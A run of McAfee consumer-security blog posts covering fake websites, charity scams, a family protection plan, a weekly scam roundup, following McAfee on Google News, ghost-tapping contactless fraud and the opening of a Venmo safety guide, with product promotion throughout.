      • Any personal information you may have provided
    • Additional reporting resources: The CISA maintains an updated list of reporting resources, while the Anti-Phishing Working Group investigates cases of fake sites that appear to be collecting personal information fraudulently. For text message scams, forward the message to 7726 (SPAM).

    Final thoughts

    Recognizing fake sites and emails becomes easier with practice. The key is to trust your instincts—if something feels suspicious or too good to be true, take a moment to verify through official channels. With the simple verification techniques covered in this guide, you can confidently navigate the digital world and spot fake sites and emails before they cause harm.

    Your best defense is to make these quick security checks a regular habit—verify URLs, look for secure connections, and trust your instincts when something feels off. Go directly to the source or bookmark your most frequently used services and always navigate to them. Enable two-factor authentication on important accounts, and remember that legitimate companies will never ask for sensitive information via email. Maintaining healthy skepticism about unsolicited communications will protect not only your personal information but also help create a safer online environment for everyone.

    For the latest information on fake websites and scams and to report them, visit the Federal Trade Commission’s scam alerts or the FBI’s Internet Crime Complaint Center.

    The post Ways to Tell if a Website Is Fake appeared first on McAfee Blog.

    How to Spot Charity Scams and Donate Safely this Giving Season

    By: McAfee

    The holidays are the season of giving; unfortunately, it’s also the season when scammers try to cash in on the spirit of generosity

    If you’re seeing a heartfelt charity ad on social media, a touching email, or a surprise text asking you to donate, it’s worth pausing for a moment. Is it genuine charity—or a scam built to tug at your heartstrings?

    The good news: staying safe doesn’t mean stopping your generosity. With a few quick checks, you can give confidently and protect yourself.

    What is charity fraud?

    Charity fraud is when scammers pose as legitimate nonprofits—or misuse the name of a real charity—to trick people into donating money or giving away personal information.

    In some cases, the organization is completely fake. In others, it’s a real charity that uses donations in misleading or unethical ways, passing very little money to the actual cause.

    Type 1: Fully fake charities

    The first type involves flat-out fraud, where the organization is a front for a scam, through and through. Any money you give goes straight into the scammer’s pocket. As does your personal and payment info, which can lead to further fraud.

    Type 2: Low impact “charities”

    These are real, registered charities. But They keep the majority of donations for overhead instead of helping the cause.

    This second type often involves questionable practices by the organization. According to the Better Business Bureau, reputable organizations keep 35% or less of their funds for operations.

    Meanwhile, some less-than-reputable organizations keep up to 95% of funds, leaving only 5% for advancing the cause they advocate. (For a closer look at some examples, the independent watchdog group Charity Watch published a blog highlighting some of the worst charities they audited in 2024.)

    Common to both, they’ll indeed play on your emotions, and they’ll urge you to donate now. As it is with so many scams and shady deals on the internet, you’ll find a sense of urgency central to their message.

    How to spot a charity scam

    1. Look for a dot-org domain

    For starters, reputable charities often have dot-org as their domain extension—versus dot-com or any one of the hundreds of permutations available today.

    2. Research the organization

    Charities leave a paper trail, one that can get audited. And fake ones won’t leave a trail at all. With a quick look at some reputable online resources, you can quickly find out if the charity you want to support is legit.

    In the U.S., the Federal Trade Commission (FTC) has a site full of resources so that you can make your donation truly count. Resources like Charity Watch and Charity Navigator, along with the BBB’s Wise Giving Alliance can also help you identify the best charities. You can also look up a charity’s Form 990 tax return online.

    3. Take your time

    This goes hand-in-hand with the above. If you feel like you’re getting rushed to donate, it could be a sign of a scam. Step back and indeed do your research with a few clicks to the resources listed above.

    4. Pay with a credit card

    This protects you in two ways. If you fall victim to a scam, you can contest the charges with your credit card company. And if a scammer tries to use your card again for other purchases, you can contest those too. Also, in the U.S., credit cards offer you additional protection that debit cards don’t. That’s thanks to the Fair Credit Billing Act (FCBA). It limits your liability to $50 for fraudulent charges on a credit card if you report the loss to your issuer within 60 days.

    5. Avoid sketchy payment methods

    The following is a sure-fire red flag: requests for payment in cash, gift cards, cryptocurrency, or wire transfers. Don’t ever use these forms of payment for charities, let alone anything else online.

    6. Donate directly

    Better yet, donate directly. Rather than respond to calls, ads, emails or texts, donate on your terms. After you give your possible donation some time and thought, you can go directly to the website of a charitable organization that you’ve researched.

    And here’s how McAfee can help you stay safer still.

    Get a scam detector. You can combine your healthy skepticism and awareness with the right technology, like our Scam Detector and Web Protection.

    Both will alert you if a link you received might take you to a sketchy site. It’ll also block those sites if you accidentally tap or click on a bad link.

    Clean up your personal info online. Scams over email, phone, and text all require the same thing: your contact info.

    In many cases, scammers get it from data broker sites. Data brokers buy, collect, and sell detailed personal info, which they compile from several public and private sources, such as local, state, and federal records, plus third parties like supermarket shopper’s cards and mobile apps that share and sell user data.

    Moreover, they’ll sell it to anyone who pays for it, including people who’ll use that info for scams. You can help reduce those scam texts and calls by removing your info from those sites. Our Personal Data Cleanup scans some of the riskiest data broker sites and shows you which ones are selling your personal info.

    Monitor your identity and credit. The problem with many scams is that you only find out about it once the damage is done, like when a scammer uses your phished card number to make additional purchases in your name.

    Actively monitoring your identity and credit can spot a problem before it becomes an even bigger one. You can take care of both easily with our credit monitoring and identity monitoring.

    Additionally, our identity theft coverage can help if the unexpected happens with up to $2 million in identity theft coverage and identity restoration support if determined you’re a victim of identity theft.​

    You’ll find these protections, and plenty more, in McAfee+.

    A safe way to support the fight against cybercrime

    If you want to give back and help protect people from online fraud, McAfee has partnered with Fight Cyber Crime, a legitimate U.S. nonprofit dedicated to helping victims of online scams.

    You might remember them from our Scam Stories partnership earlier this year, sharing real stories from real scam victims to raise awareness about threats facing us every day on and offline.

    Why we recommend them

    • They provide free support and recovery guidance to scam victims.
    • They raise nationwide awareness about cybercrime.
    • They’re a vetted, established organization doing real work in online safety.

    How you can help

    Visit their site to learn more or make a donation: https://fightcybercrime.org/about/donate/

    Supporting validated charities like Fight Cyber Crime is one way to make a real impact this holiday season—without putting yourself at risk.

    The post How to Spot Charity Scams and Donate Safely this Giving Season appeared first on McAfee Blog.

    Protect the Whole Family with McAfee+ Ultimate Family Plan

    By: McAfee

    Many content creators highlight the differences between today’s most prominent generations: the Silent Generation, baby boomers, Generation X, millennials, and Generations Z and Alpha. No generation seems to have much in common with the others. In truth, there is something that people can agree on: identity and online privacy protection. Young or old, cybercriminals don’t discriminate against who they target. In fact, some generations are more prone to certain scams than others. Educating yourself and your family members on current cyberthreats is the first step to defending against them. In this guide, we’ll take a look at how to protect every age group from online threats.

    Family protection matters

    Your family faces an onslaught of online threats that didn’t exist just a decade ago, and growing. The FBI’s 2024 Internet Crime Report shows that Americans alone lost over $18 billion to cybercrime since 2020. That’s why protecting your family entails more than just antivirus software. Digital protection now encompasses safeguarding your household’s online privacy, monitoring for identity threats, and securing every family device that connects to the internet. This is how risks impact different family members differently:

    • Your children and teens, 97% of whom own a smartphone, face vulnerabilities through social media platforms, gaming networks, and school devices. They’re naturally curious and trusting, making them prime targets for social engineering scams disguised as friend requests or free game downloads.
    • Adults in your household juggle multiple online responsibilities—banking, shopping, work communications, and managing family accounts. The rush of daily life can make you more susceptible to phishing emails that look legitimate or malicious links embedded in seemingly innocent messages.
    • Senior family members often become targets because they may be less familiar with evolving online scams. In 2024, the FTC received 147,127 complaints from adults aged 60 years and above, resulting in $4.8 billion in losses. But since many of these incidents go unreported, that figure may actually go as high as $61.5 billion.

    Depending on the age group, criminals adapt their tactics based on who they’re targeting. With the right protection, you can expand your family’s digital life with confidence. When you have the right safeguards in place, your family can fully embrace the incredible opportunities that technology offers. Your kids can safely research school projects, your teens can connect with friends responsibly, and you can manage your household efficiently online. The most effective digital safety approach is to create a safety net with layered protection, one that works across all your devices and considers each family member’s technology usage—whether that’s helping your teenager safely explore career interests online, ensuring your online banking stays secure, or giving grandparents peace of mind when video chatting with distant relatives. This means combining real-time threat detection, safe browsing tools, identity monitoring, and secure connections through a virtual private network.

    Distinct protections per age group

    No two generations use technology the same way—and cybercriminals know it. Children, teens, adults, and seniors each face unique digital risks shaped by their habits, confidence levels, and online environments. That’s why effective cybersecurity isn’t one-size-fits-all. Tailoring protection to each age group ensures that everyone—from curious kids to tech-savvy adults—can navigate the digital world safely and confidently.

    Safeguard childhood

    Cybercriminals can buy Social Security Numbers (SSNs) of minors on the dark web or gather them through medical records or school system breaches. SSNs are valuable to a cybercriminal because the theft can go undetected for years since children aren’t yet opening credit cards or applying for mortgages. It’s never too early to start identity monitoring. For the same reason, you might consider putting a credit freeze on behalf of your child since they won’t be needing it for several years. A credit freeze makes your child’s credit inaccessible to everyone, including criminals, and won’t negatively affect their credit score.

    Digital safety with tween and teen independence

    Once your child becomes a teenager, they can be allowed to open their first email addresses and social media profiles independently. It’s an important life lesson in organization, responsibility, and digital literacy. However, these platforms could open them to risks such as cyberbullying, fake news, and social engineering. The best way to avoid being cyberbullied is through education. Ensure that your tweens and teens who spend unsupervised time on their devices know what to do if they encounter cyberbullying. The best course of action is to report the incident to an adult and, in the meantime, to suspend their accounts.

    Prepare the seniors

    Cybercriminals often seek out seniors as easy targets for online scams because they are typically less digitally savvy. They may not realize that some emails in their inbox could be sent by someone with bad intentions. What can start out as a friendly email pal can quickly spiral into divulging sensitive personal information or sending huge sums of money to a criminal. The best way to prepare the seniors in your life for online safety is to impart a few, easy-to-follow absolutes. Start with these three rules:

    • Never tell anyone your password. Your bank, tax filing service, nor the IRS will ever need it.
    • Never divulge your SSN over email.
    • Never send money to a stranger, no matter how much their “sob story” tugs at your heartstrings.

    Manage what’s right for your family online

    Creating a safer digital environment for your children doesn’t require you to become a tech expert. With the right approach and tools, you can establish healthy digital boundaries that protect your children while allowing them to enjoy the benefits of our connected world.

    Start with open conversation

    Before implementing any technical measures, have honest discussions with your family about online safety to build trust and help you recognize each family member’s digital journey. Explain that protective measures will not restrict freedom, but reduce risks such as phishing attempts, malware infections, and exposure to inappropriate content.

    Create a family technology agreement

    A family tech agreement serves as your household’s digital constitution. Work together to establish rules about screen time, appropriate websites, social media use, and consequences for breaking agreements, including guidelines about sharing personal information, downloading apps, and what to do if they encounter something concerning online.

    Enable parental controls

    Most devices and platforms offer robust parental control features. iOS devices’ Screen Time and Android’s Family Link allow you to set app limits and content restrictions, while Windows and macOS can filter content and set time limits. The Federal Communications Commission recommends router-level filtering as the first line of defense because it automatically protects all devices connected to your network.

    Set up app and content filters

    Configure age-appropriate content filters on streaming services, gaming platforms, and app stores. Netflix, Disney+, and other services allow you to create child-friendly profiles with content restrictions, while gaming consoles like PlayStation, Xbox, and Nintendo Switch include comprehensive parental controls for game ratings, online interactions, and spending limits. For web browsing, enable SafeSearch on Google, Bing, and other search engines to create clarity and keep harmful content from appearing in search results.

    Optimize privacy settings across platforms

    Because social media platforms often favor data collection over privacy, it is critical that you adjust privacy settings on all social media accounts and apps your family uses. Turn off location sharing and disable targeted advertising when possible, and limit who can contact your children online. To reduce younger children’s exposure to social engineering attempts and inappropriate contact from strangers, make their profiles private by default and require approval for new followers or friend requests.

    Deploy safe browsing tools

    Your teen could be so focused on downloading a “free” TV or video game that they may not recognize the signs of malicious sites such as typos, blurry logos, or incredible offers. Trustworthy safe browsing extensions and software could protect your teen from these unsafe downloads, as well as from risky websites, hidden malware, phishing, and social media bots. Safe browsing extensions could teach your family members to develop better security instincts when they see warnings about suspicious URLs, poor website design, and too-fantastic offers.

    Make protection age-appropriate

    Tailor your approach to each family member’s age, digital maturity, and comfort level with technology. Younger children will need more restrictive settings and closer supervision, while teenagers are more open when they understand the reason behind the rules and can have some autonomy with clear consequences for misuse.

    Regular check-ins and updates

    As technology evolves, ongoing conversation about responsible usage will allow you to address new apps, games, or websites your family wants to explore. Set a monthly family meeting to discuss online experiences, review your technology agreement, and adjust settings as needed. When you implement these strategies consistently, your family will experience fewer security incidents, reduced exposure to inappropriate content, and better digital habits overall. These tools and strategies work best when combined with ongoing communication and a family culture that prioritizes both digital exploration and safety. In addition, children who grow up with these protections develop stronger security awareness and are less likely to fall victim to online scams as they become more independent digital users.

    Mindfulness is safety

    As an adult, you typically have better street smarts than teens. However, the daily rush of juggling work, social obligations, and running a household could leave you without much time to spare, even for romance. As a result, living life in the fast lane makes you more susceptible to scams, phishing, malware, and computer viruses. The best way to prevent falling for these digital threats is this: slow down! Take your time when you receive any message from someone you don’t know or have never met in person. If you feel even an iota of suspicion, don’t engage with the sender. Delete the message. If it’s important, the person or organization will follow up. To fully protect your connected devices and the personally identifiable information they store, consider investing in safe browsing, antivirus software, and identity monitoring and restoration services to catch any threats that may have passed under your watchful eye.

    Modern antivirus for today’s cyberthreats

    While you might think your devices are already secure, modern cyberthreats have evolved to become more virulent, far beyond what traditional built-in protections can handle. In response, antivirus solutions have transformed into intelligent security systems that provide comprehensive, real-time protection using behavioral analysis, machine learning, and cloud-based threat detection. These advanced technologies actively identify and block phishing attacks, malware, ransomware, and malicious websites that traditional security measures often miss. While operating systems such as Windows and macOS include basic security features, they’re designed as general safeguards rather than comprehensive family protection solutions. Built-in protections typically focus on known threats, but do not detect zero-day attacks, sophisticated phishing schemes, or emerging malware variants that cybercriminals specifically design to evade standard defenses. Consider these daily family scenarios where your teenager brings home their school laptop. It may have been exposed to threats through shared networks or downloads from classmates. That family tablet everyone uses for streaming and games becomes a potential entry point for malicious apps or compromised websites. When you connect to public Wi-Fi at the coffee shop, airport, or hotel during family travel, you’re exposing your devices to network-based attacks that built-in protections weren’t designed to handle. Your modern family needs a comprehensive antivirus solution that monitors all your family’s devices continuously, learns each member’s online behavior patterns, and adapts its protection accordingly. This means blocking that suspicious email before your spouse clicks on it, preventing your child from accidentally downloading malware disguised as a game, and ensuring your smart home devices remain secure. The best value comes from bundled services that address your family’s complete digital life. Identity monitoring services watch for signs that your family members’ personal information has been compromised in data breaches. A family VPN service encrypts your internet connection, protecting sensitive information when family members use public Wi-Fi networks for school projects, work calls, or entertainment. This integrated protection works seamlessly not just to protect individual devices, but to safeguard your entire family’s digital ecosystem. With cybercrime damages projected to continue growing significantly each year, investing in comprehensive family protection is one of the smartest decisions you can make for your household’s digital well-being.

    The ultimate protection plan

    Get the whole family committed to safer and more private online lives with the help of McAfee+ Ultimate Family Plan. This plan covers up to six individuals in your family with an entire suite of comprehensive privacy, identity, and device security features. The plan also includes preventive measures to fight online crime, such as safe browsing tools, an advanced firewall, unlimited VPN, and antivirus software for unlimited devices. Your family can also receive up to $2 million in identity theft recovery and $50,000 in ransomware coverage. With the McAfee+ Ultimate Family Plan, device security extends across unlimited computers, smartphones, and tablets, while its advanced antivirus software automatically updates to defend you against the latest threats. Safe browsing tools block malicious websites before they can cause harm, and the unlimited VPN encrypts internet connections on public networks, while the built-in firewall monitors incoming and outgoing traffic. All your family’s login credentials on all devices will be secure with password management, while secure cloud storage protects important documents and family photos. Real-time alerts notify you immediately when scams are detected or suspicious activity occurs.

    Protection tailored for every family member

    Every family member faces different online risks, shaped by their age, habits, and digital experience. Children need safeguards against identity theft and unsafe content, while teens require protection that balances independence with security. Adults juggle multiple connected accounts that demand advanced monitoring, and seniors benefit from simplified defenses against scams and fraud. A one-size-fits-all approach no longer works. The McAfee+ Ultimate Family Plan effectively adapts to each person’s unique digital life, ensuring that everyone stays safe, confident, and connected online:

    • Your young children’s Social Security Numbers will be monitored for misuse, while your teens will be protected from risky downloads and phishing attempts and still maintain their online autonomy.
    • The adults in your family will benefit from comprehensive identity theft protection that monitors credit reports, bank accounts, and personal information across the dark web. Meanwhile, your email and social media accounts will be continuously surveilled for unauthorized access.
    • Seniors will receive simplified alerts and protection specifically designed for common online scams and be supported by top-notch identity restoration specialists to resolve any issues that arise.

    Quick start checklist

    Getting started with the McAfee+ Ultimate Family Plan takes only minutes. Simply follow this short list to start protecting your family’s digital life:

    • Account creation: Create a master account at mcafee.com using the primary family email address. This account becomes your central dashboard for managing all family members’ protection.
    • Add family profiles: Add family profiles by entering each member’s basic information. You can include up to six family members with personalized settings—spouses, children, and other household members. Each person receives their own unique protection settings based on their age and device usage patterns.
    • Install on devices: Download the McAfee app on every family device—computers, phones, and tablets. The software automatically synchronizes with your primary family account and begins protecting all devices immediately. The installation process typically completes in under five minutes per device.
    • Enable key protections: Once installation is done, you can start activating identity monitoring, VPN, and safe browsing for each member.
    • Turn on alerts: You will also need to configure notification preferences for each device to activate alerts when security events and threats occur.
    • Test your setup: To see if the installation works, run initial antivirus scans on all devices. You can also test the VPN to ensure that the connection works.

    Essential tips to protect your family online

    A comprehensive online security solution combined with best digital practices can go a long way in protecting your loved ones from identity theft, scams, and online risks. These essential tips will help you strengthen your family’s digital defenses, build safer online routines, and give everyone the confidence to explore the internet securely.

    • Use unique passwords and multi-factor authentication: Doing this prevents hackers from accessing multiple accounts even if one password is compromised. Enable MFA on all critical accounts.
    • Enable automatic updates on all devices: Configure automatic security updates to keep your family’s devices protected against the latest security threats without requiring constant manual action from you.
    • Turn on safe browsing and firewall protection: Enabling safe browsing features blocks malicious websites and unauthorized network access before they can harm your family’s devices and data.
    • Use a VPN on public Wi-Fi networks: A VPN protects your data on public networks by encrypting your family’s internet connection in hotel, coffee shop, or airport Wi-Fi to prevent data theft.
    • Set device-level parental controls: Configure age-appropriate content filters to protect children from inappropriate content while teaching responsible digital habits.
    • Consider freezing minors’ credit reports: Credit freezing will prevent identity thieves from opening fraudulent accounts in your children’s names, as they won’t need credit yet.
    • Teach family members to recognize phishing red flags: Educating your family to identify common phishing tactics empowers them to spot red flags in suspicious emails, texts, and websites that try to steal personal information.
    • Back up important family files regularly: Create a comprehensive backup strategy to ensure precious photos, documents, and memories are safe even if devices are lost, stolen, or infected with ransomware.
    • Monitor identities for the whole family: Use family plans to catch suspicious activity early, allowing you to respond quickly if someone’s personal information is compromised.

    Final thoughts

    Protecting your family’s digital life doesn’t have to be overwhelming. With the right knowledge, best digital practices, and a comprehensive security solution like McAfee+ Ultimate Family Plan, you can safeguard everyone against today’s online threats. A comprehensive family plan will help you enable safe browsing tools, monitor your family members’ identities, educate each family member about their unique risks, and build a strong foundation of online security. Start implementing these protective measures today, and stay informed about emerging threats and security best practices to keep your loved ones safe in our connected world.

    The post Protect the Whole Family with McAfee+ Ultimate Family Plan appeared first on McAfee Blog.

    This Week in Scams: DoorDash Breach and Fake Flight Cancellation Texts

    By: McAfee

    Leading off our news on scams this week, a heads-up for DoorDash users, merchants, and Dashers too. A data breach of an undisclosed size may have impacted you.

    Per an email sent by the company to “affected DoorDash users where required,” a third party gained access to data that may have included a mix of the following:

    • First and last name
    • Physical address
    • Phone number
    • Email address

    You might have got the email too. And even if you didn’t, anyone who’s used DoorDash should take note.

    As to the potential scope of the breach, DoorDash made no comment in its email or a post on their help site. Of note, though, is that one of the help lines cited in their post mentions a French-language number—implying that the breach might affect Canadian users as well. Any reach beyond the U.S. and Canada remains unclear.

    Per the company’s Q2 financial report this year, “hundreds of thousands of merchants, tens of millions of consumers, and millions of Dashers across over 30 countries every month.” Stats published elsewhere put the user base at more than 40 million people, which includes some 600,000 merchants.

    The company underscored that no “sensitive” info like Social Security Numbers (and potentially Canadian Social Insurance Numbers) were involved in the breach. This marks the third notable breach by the well-known delivery service, with incidents in 2019 and 2022

    Image of DoorDash email about data breach.
    Image of DoorDash email about data breach.

    What to do if you think you got caught up in the DoorDash breach

    While the types of info involved here appear to be limited, any time there’s a breach, we suggest the following:

    Protect your credit and identity. Checking your credit and getting identity theft protection can help keep you safer in the aftermath of a breach. Further, a security freeze can help prevent identity theft if you spot any unusual activity. You can get all three in place with our McAfee+ Advanced or Ultimate plans.

    Keep an eye out for phishing attacks. With some personal info in hand, bad actors might seek out more. They might follow up a breach with rounds of phishing attacks that direct you to bogus sites designed to steal your personal info. As with any text or email you get from a company, make sure it’s legitimate before clicking or tapping on any links. Instead, go straight to the appropriate website or contact them by phone directly. Also, protections like our Scam Detector and Web Protection can alert you to scams and sketchy links before they take you somewhere you don’t want to go.

    Update your passwords and use two-factor authentication. Changing your password is a strong preventive measure. Strong and unique passwords are best, which means never reusing your passwords across different sites and platforms. Using a password manager helps you stay on top of it all while also storing your passwords securely.

    Attention travelers: Now boarding, a rise in flight cancellation scams

    Even as the FAA lifted recent flight restrictions on Monday morning, scammers are still taking advantage of lingering uncertainty, and upcoming holiday travel, with a spate of flight cancellation scams.

    How the scam works

    Fake cancellation texts

    The first comes via a text message saying that your flight has been cancelled and you must call or rebook quickly to avoid losing your seat—usually in 30 minutes. It’s a typical scammer trick, where they hook you with a combination of bad news and urgency. Of course, the phone number and the site don’t connect you with your airline. They connect you to a scammer, who walks away with your money and your card info to potentially rip you off again.

    Fake airline sites in search results

    The second uses paid search results. We’ve talked about this trick in our blogs before. Because paid search results appear ahead of organic results, scammers spin up bogus sites that mirror legitimate ones and promote them in paid search. In this way, they can look like a certain well-known airline and appear in search before the real airline’s listing. With that, people often mistakenly click the first link they see. From there, the scam plays out just as above as the scammer comes away with your money and card info.

    How to avoid flight cancellation scams

    Q: How can I confirm whether my flight is really canceled?
    A: Check directly in your airline’s official app or website. Never click links in texts or emails.

    Q: How can I spot a fake airline search result?
    A: Look for “Ad”/“Sponsored,” confirm the URL, and check that the site uses HTTPS, not HTTP.

    Q: Is there a tool that flags fake booking sites?
    A: Scam-spotting tools like Scam Detector and Web Protection can identify sketchy links before you click.

    In search, first isn’t always best.

    Look closely to see if your top results are tagged with “Sponsored” or “Ad” in some way, realizing it might be in fine print. Further, look at the web address. Does it start with “https” (the “s” means secure), because many scam sites simply use an unsecured “http” site. Also, does the link look right? For example, if you’re searching for “Generic Airlines,” is the link the expected “genericairlines dot-com” or something else? Scammers often try to spoof it in some way by adding to the name or by creating a subdomain like this: “genericairlines.rebookyourflight dot-com.”

    Get a scam detector to spot bogus links for you.

    Even with these tips and tools, spotting bogus links with the naked eye can get tricky. Some look “close enough” to a legitimate link that you might overlook it. Yet a combination of features in our McAfee+ plans can help do that work for you.  Our Scam Detector helps you stay safer with advanced scam detection technology built to spot and stop scams across text messages, emails, and videos. Likewise, our Web Protection will alert you if a link might take you to a sketchy site. It’ll also block those sites if you accidentally tap or click on a bad link.

    Scammers Hijack a Trusted Mass Texting Provider

    You’ve probably seen plenty of messages sent by short code numbers. They’re the five- or six-digit codes used to send texts instead of by a phone number. For example, your cable company might use one to send a text for resetting a streaming password, the same goes for your pharmacy to let you know a prescription is ready or your state’s DoT to issue a winter travel alert, and so on.

    According to NBC News, scammers sent hundreds of thousands of texts using codes used by the state of New York, a charity, and a political organizing group. The article also cites an email sent to messaging providers by the U.S. Short Code Registry, an industry nonprofit that maintains those codes in the U.S. In the email, the registry said attempted attacks on messaging providers are on the rise.

    What this means for the rest of us is that just about any text from an unknown number, and now short codes, might contain malicious links and content. It’s one more reason to arm yourself with the one-two punch of our Scam Detector and Web Protection.

    What are short codes?
    Short codes are 5–6 digit numbers used by pharmacies, utilities, banks, and government agencies to send official alerts.

    Why this attack is unusual
    Scammers didn’t spoof short codes—they gained access to real ones used by:

    • The State of New York
    • A charity
    • A political organizing group

    Why this matters
    Even texts from legitimate short-code numbers can no longer be trusted at face value.

    What to do now

    • Treat any unexpected text—even from a short code—as suspicious.
    • Don’t tap links.
    • Verify by going directly to the official website or app.

    Quick Scam Roundup

    Consumers warned over AI chatbots giving inaccurate financial advice 

    • Our advice: Always verify recommendations with trusted financial sources

    Why our own clicks are often cybercrime’s greatest allies

    • Our advice: Many attacks rely on rushed or emotional decisions, slow down before clicking

    TikTok malware scam uses fake software activation guides to steal data

    • Our advice: Download software only from official sources

     

    We’ll be back after the Thanksgiving weekend with more updates, scam news, and ways to stay cyber safe.

    The post This Week in Scams: DoorDash Breach and Fake Flight Cancellation Texts appeared first on McAfee Blog.

    How to Follow McAfee on Google News in One Simple Step

    By: McAfee

    Want McAfee’s latest scam alerts, cybersecurity tips, and safety updates to show up automatically in your Google News feed? You can follow McAfee directly on Google News with a single tap.

    Google News now gives every official publisher a dedicated page — and McAfee has one. Once you follow us, our newest articles will appear in your Following tab and throughout your personalized news feed whenever they’re relevant to you.

    Here’s how to do it in seconds.

    Follow McAfee on Google News

    Step 1: Go to our official Google News page

    Tap or click this link:

    McAfee Official Google News Source Page

    This opens McAfee’s verified publisher page inside Google News.

    Image shows McAfee's Google News source page.
    Image shows McAfee’s Google News source page.

    Step 2: Tap the ⭐ “Follow” button

    You’ll see a star icon at the top of the page.

    Tap Follow and you’re done.

    That’s it — McAfee is now part of your personalized news feed.

    What happens after you follow McAfee

    When you tap the star:

    • McAfee appears under Following → Sources in Google News
    • Our stories show up more often when you search for cybersecurity topics
    • You’ll see McAfee alerts, safety tips, and threat updates sooner
    • Google prioritizes McAfee when we publish on topics you care about (AI scams, malware, identity theft, etc.)

    No settings menus. No advanced search. Just one tap.

    How to Unfollow or Manage Your Sources

    If you ever want to update your feed:

    1. Open Google News

    2. Go to Following → Sources

    3. Tap the star again to unfollow

    4. Or rearrange which sources matter most to you

     

    Image shows how to find your preferred sources in Google News

    FAQs

    Do I need the Google News app?

    No. Following works in both browsers and the app.

    Will this make McAfee show up first for every search?

    Not automatically — but Google does prioritize publishers you follow when the content is relevant.

    Can I follow McAfee on multiple devices?

    Yes. It’s tied to your Google account, not your phone or laptop.

    Is the follow button safe?

    Absolutely. This is Google’s built-in publisher follow system.

    Stay Updated, Stay Safer

    Cyber threats move fast — following McAfee on Google News makes it easier to stay ahead of scams, breaches, and emerging AI risks.

    The post How to Follow McAfee on Google News in One Simple Step appeared first on McAfee Blog.

    Ghost Tapping: What It Is, How It Works, and How to Stay Safe

    By: McAfee

    Contactless payments make everyday purchases fast and easy. Yet with that convenience comes a risk: ghost tapping.

    In crowded spaces or rushed moments, a scammer could trigger a small tap-to-pay charge or push through a higher amount without your clear consent. Understanding what ghost tapping is, how it happens, and what to do next helps you keep your money and identity secure.

    What Is Ghost Tapping?

    Ghost tapping is a form of contactless fraud where someone attempts to initiate a tap-to-pay transaction without your approval.

    Tap-to-pay cards and mobile wallets on phones use a technology called “near-field communication,” or NFC. That lets them communicate with things like a point-of-sale device for payment at a very close range. It’s generally quite safe, particularly because of the “near” part. You have to get very close to make the connection.

    Even so, proximity and distraction can be exploited. Attackers may try to skim limited details from RFID (Radio Frequency Identification technology) cards or NFC cards, or nudge you into approving a payment you didn’t intend. If you’ve ever wondered what ghost tapping is, think of it as an opportunistic, in-person scam that abuses the tap-to-pay moment rather than a remote hack.

    How Ghost Tapping Happens

    Most schemes rely on getting close and catching you off guard. A criminal might carry a portable reader, press into a pocket or bag, and attempt a low-value charge. Others set up tampered terminals, rushing you so you don’t check the amount.

    Consider These Two Scenarios:

    You’re at a busy farmer’s market. A scammer with a phone equipped with a point-of-sale app stumbles into you and gets close enough to your card to trigger a transaction. It’s almost like a modern-day pickpocket move, where the bump distracts the victim from the theft as it happens.

    In another case, you might come across a phony vendor. Maybe someone’s selling cheap hats outside a football game or someone’s going around your neighborhood selling candy, supposedly to support a charity. In scenarios like these, you tap to pay with your phone just as you’d expect… but with one exception: the “vendor” jacks up the purchase price. They hurry you through the transaction, so quickly that you don’t review the screen before you confirm payment.

    We’ve also seen reports of people getting Apple Pay scammed by impostor merchants who exploit quick taps and small screens. While mobile wallets add strong safeguards, poor visibility and social pressure can still lead to losses.

    The Better Business Bureau on Ghost Tapping:

    A report posted on the Scam Tracker at the Better Business Bureau (BBB) shows how the phony vendor version of this scam allegedly played out:

    “An individual is going door to door in [location redacted] claiming to be selling chocolate on behalf of [redacted] to support special needs students. He says that he can only accept tap-to-pay to get people to pay with a card. He then charges large amounts to the card without the cardholder being able to see the amount. He got my mother for $537… Another victim for $1100… He changes neighborhoods frequently to avoid getting caught.”

    Signs of Ghost Tapping and Common Myths

    Early ghost detecting starts with vigilance. Watch for unfamiliar small charges, especially after crowded events, and alerts tied to contactless transactions. If you see odd activity tied to RFID cards or NFC cards, act quickly.

    Common myths persist. Attackers can’t drain accounts from far away, clone full cards via a tap, or bypass wallet protections easily. Most successful cases hinge on proximity, distraction, and human error. Meanwhile, Apple Pay scam stories often involve rushed taps and unverified totals.

    Effective ghost detecting focuses on timely alerts, careful review, and immediate response.

    How to Protect Yourself from Ghost Tapping Scams

    The BBB, which recently broke the story of these scams, offers several pieces of advice. We have some advice we can add as well.

    From the BBB…

    • Store your cards securely. An RFID-blocking wallet or sleeve can help stop wireless skimming.
    • Always confirm payment details. Before tapping your card or phone, check the merchant’s name and amount on the terminal screen.
    • Set up transaction alerts. Many banks allow real-time notifications for every charge.
    • Keep an eye on your accounts. Daily checks help you spot fraud faster.
    • Limit tap-to-pay use in high-risk areas. Consider swiping or inserting your card instead.

    From us at McAfee…

    Monitor your identity and your credit.

    The problem with many card scams is that they can lead to further identity theft and fraud, which you only find out about once the damage is done. Actively monitoring your identity and credit goes beyond single transaction alerts from your bank and can spot an emerging problem before it becomes an even bigger one. You can take care of both easily with timely notifications from our credit monitoring and identity monitoring features, all as part of our McAfee+ plans.

    When you’re out and about, consider what you’re carrying—and where you carry it.

    The physical safety of your phone and cards counts as well. While ghost tapping scams are new, old-school physical pickpocketing attempts persist. When it comes to devices and things like debit cards, credit cards, and even cash, keep what you bring with you to the bare minimum when you go out. This can cut your losses if the unfortunate happens. If you have a credit card and ID holder attached to the back of your phone, you may want to remove your cards from it. That way, if your phone gets snatched, those important cards don’t get snatched as well.

    When in doubt, shop with a credit card.

    In the U.S., credit cards offer you additional protection that debit cards don’t. That’s thanks to the Fair Credit Billing Act (FCBA). It limits your liability to $50 for fraudulent charges on a credit card if you report the loss to your issuer within 60 days.

    The post Ghost Tapping: What It Is, How It Works, and How to Stay Safe appeared first on McAfee Blog.

    Venmo 101: Making Safer Payments with the App

    By: McAfee

    As the holiday season ramps up, so do group dinners, shared travel costs, gift exchanges, and all the little moments where someone says, “Just Venmo me.”

    With more people sending and splitting money this time of year, scammers know it’s prime time to target payment apps. Here’s how to keep your Venmo transactions safe during one of the busiest — and riskiest — payment seasons.

    What kind of scams are on Venmo?

    Venmo scams come in all shapes, and many of them look like variations of email phishing and text scams. The scammers behind them will pose as Venmo customer service reps who ask for your login credentials. Other scammers offer bogus cash prizes and pyramid schemes that lure in victims with the promise of quick cash. Some scammers will use the app itself to impersonate friends and family to steal money.

    Venmo has a dedicated web page on the topic of scams, and lists the following as the top Venmo scams out there:

    ·       Fake Prize or Cash Reward

    ·       Call from Venmo

    ·       Call from Tech Support

    ·       Fake Payment Confirmation

    ·       Pre-payment for Goods and Services

    		 ·       Stranger Posing as a Friend

